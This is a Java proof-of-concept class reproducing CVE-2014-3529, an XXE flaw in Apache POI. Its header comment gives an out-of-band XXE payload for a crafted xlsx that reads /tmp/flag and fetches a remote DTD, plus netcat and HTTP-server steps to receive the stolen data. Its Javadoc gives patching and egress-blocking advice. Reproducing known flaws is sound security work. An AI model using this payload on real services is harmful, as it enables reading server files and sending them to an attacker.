package com.threedr3am.bug.poi;

import java.io.IOException;
import org.apache.poi.EncryptedDocumentException;
import org.apache.poi.ss.usermodel.Sheet;
import org.apache.poi.ss.usermodel.Workbook;
import org.apache.poi.ss.usermodel.WorkbookFactory;

/**
 * 1. unzip test.xlsx
 * 2. vim [Content_Types].xml, insert at line 2 (  <!DOCTYPE note [<!ENTITY % file SYSTEM "file:///tmp/flag"><!ENTITY % remote SYSTEM "http://127.0.0.1:23234/xxe.dtd">%remote;%all;]><root>&send;</root>  )
 * 3. zip -r 0 test.xlsx ./*
 * 4. echo "threedr3am" > /tmp/flag
 * 5. nc -lvvp 23235
 * 6. cp xxe.dtd /tmp/poi/xxe.dtd & cd /tmp/poi/ & python -m SimpleHTTPServer 23234
 *
 * @author threedr3am
 */
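public class CVE_2014_3529 {

    /**
     * Opens the bundled {@code test.xlsx} through {@link WorkbookFactory} and prints the last row
     * index of its first sheet.
     *
     * <p>The call to {@code WorkbookFactory.create} is the step under test. Per the class-level
     * steps, the DOCTYPE is placed in {@code [Content_Types].xml}, so any entity resolution
     * would presumably happen while the package is being opened, before the sheet is read.
     * NOTE(review): on a POI release that contains the fix for this CVE the open is expected to
     * fail or leave the entity unresolved; confirm against the version on the classpath.
     *
     * <p>For services that parse uploaded OOXML files, the relevant controls are running a POI
     * release that includes the CVE-2014-3529 fix and denying the parsing host outbound network
     * access. An unexpected outbound request made while a workbook is being opened is the
     * signal to look for.
     *
     * @param args unused
     * @throws IOException if {@code test.xlsx} is missing from the classpath or cannot be read
     * @throws EncryptedDocumentException propagated from {@code WorkbookFactory.create}
     * @throws org.apache.poi.openxml4j.exceptions.InvalidFormatException propagated from
     *     {@code WorkbookFactory.create}
     */
    public static void main(String[] args)
        throws IOException, EncryptedDocumentException, org.apache.poi.openxml4j.exceptions.InvalidFormatException {
        // try-with-resources releases the classpath stream even when parsing throws;
        // a null resource is permitted and is simply not closed.
        try (java.io.InputStream in =
                 CVE_2014_3529.class.getClassLoader().getResourceAsStream("test.xlsx")) {
            // getResourceAsStream returns null rather than throwing when the resource is absent;
            // fail with a clear message instead of passing null on to the parser.
            if (in == null) {
                throw new IOException("test.xlsx not found on the classpath");
            }
            Workbook wb1 = WorkbookFactory.create(in);
            Sheet sheet = wb1.getSheetAt(0);
            System.out.println(sheet.getLastRowNum());
        }
    }
}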
